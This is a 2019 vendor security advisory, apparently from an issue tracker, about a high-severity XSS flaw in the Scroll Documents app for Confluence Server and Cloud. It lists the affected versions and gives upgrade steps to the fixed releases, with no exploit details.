XSS Vulnerability in Scroll Documents - Security Advisory 2019-10-23

Description

Summary

This advisory discloses a security issue of *high* *severity* affecting Scroll Documents, and provides a step-by-step guide to help you rectify the issue. The following apps and versions are affected:

  • Scroll Documents for Confluence Server, versions 1.1.5 and older

  • Scroll Documents for Confluence Cloud, versions 2.0.6-AC and older

After updating to the fix versions, your instance is no longer affected by this security issue.

Severity

K15t Software rates the severity level of this issue as *high*.

This is our baseline assessment - it's best if you evaluate its applicability to your own IT environment.

Detailed description

Scroll Documents is affected by an XSS vulnerability where someone can put malicious code into a document that is executed when a user views the document. This can be used for example, but is not limited to:

  • Execute HTTP requests on the behalf of a user

Steps we've taken to fix this issue

We have taken the following steps to address this issue:

  • Released *Scroll Documents 1.2.0 (Server) and 2.0.7-AC (Cloud)* update on Atlassian Marketplace

  • Informed all app customers and evaluators through our release notes.

What you need to do to solve this issue on your instance

A Confluence administrator might need to upgrade Scroll Documents to these (or later) versions:

  • Scroll Documents for Confluence Cloud, version 2.0.7-AC or newer

  • Scroll Documents for Confluence Server, version 1.2.0 or newer

Scroll Documents for Confluence Cloud will usually be updated automatically in your Confluence Cloud instance by the Atlassian Marketplace. Hence, you only need to double-check if the version in the Manage Apps/Add-ons section is 2.0.7-AC or newer. If this is not the case, you need to manually trigger this update by clicking on Update in the Manage Apps/Add-ons section of your Confluence Cloud instance.

Scroll Documents for Confluence Server needs to be updated within the Manage Apps/Add-ons section of your Confluence Server. You can either do this by clicking on Update for Scroll Documents or by downloading the latest version from the Atlassian Marketplace and manually upload it to your Confluence Server.

We are here to support you

We apologize deeply for any inconvenience this issue has caused you. If you would like assistance in correcting it, then we are here to help.

In case you have any questions or want to get support in fixing the issue on your system please let us know at support@k15t.com. We are happy to schedule a 1:1 screen sharing session to help you resolve the issue should you so desire.

 

Environment

None

Assignee

Unassigned

Reporter

Candid Dauth (K15t)

Labels

None

Participants

None

QA Status

None

Deployment

Cloud
Server

Documentation Status

None

UI Concept

None

External Votes

None

Fix versions

Due date

2019/10/23

Priority

Major
Configure